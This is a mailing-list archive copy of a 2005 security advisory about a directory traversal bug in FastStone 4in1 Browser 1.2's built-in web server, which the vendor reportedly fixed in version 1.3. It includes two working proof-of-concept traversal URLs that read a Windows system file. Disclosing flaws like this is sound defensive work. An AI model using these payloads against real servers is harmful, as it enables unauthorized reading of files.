[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
directory traversal in FastStone 4in1 Browser 1.2
- To: <bugtraq@xxxxxxxxxxxxxxxxx>, <vuln@xxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>, <bugs@xxxxxxxxxxxxxxxxxxx>, <news@xxxxxxxxxxxxxx>
- Subject: directory traversal in FastStone 4in1 Browser 1.2
- From: "Donato Ferrante" <fdonato@xxxxxxxxxxxxx>
- Date: Tue, 29 Mar 2005 18:37:48 -0000
Donato Ferrante
Application: FastStone 4in1 Browser
http://www.faststone.org
Version: 1.2
Bug: directory traversal
Date: 29-Mar-2005
Author: Donato Ferrante
e-mail: fdonato@xxxxxxxxxxxxx
web: www.autistici.org/fdonato
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1. Description
2. The bug
3. The code
4. The fix
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
----------------
1. Description:
----------------
Vendor's Description:
"A FREE multi-window Web Browser with a built-in Web Server."
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------
2. The bug:
------------
The program by default has some checks to avoid malicious patterns
like "/../" into http requests, but it doesn't manage patterns like:
"\..\", "../" or "/.../".
So an attacker is able to see and download all the files on the remote
system simply using a browser.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
-------------
3. The code:
-------------
To test the vulnerability:
http://[host]/.../.../.../.../.../.../windows/system.ini
or:
http://[host]/..\..\..\..\..\..\..\..\windows/system.ini
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
------------
4. The fix:
------------
Vendor was contacted.
Bug fixed in the version 1.3.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx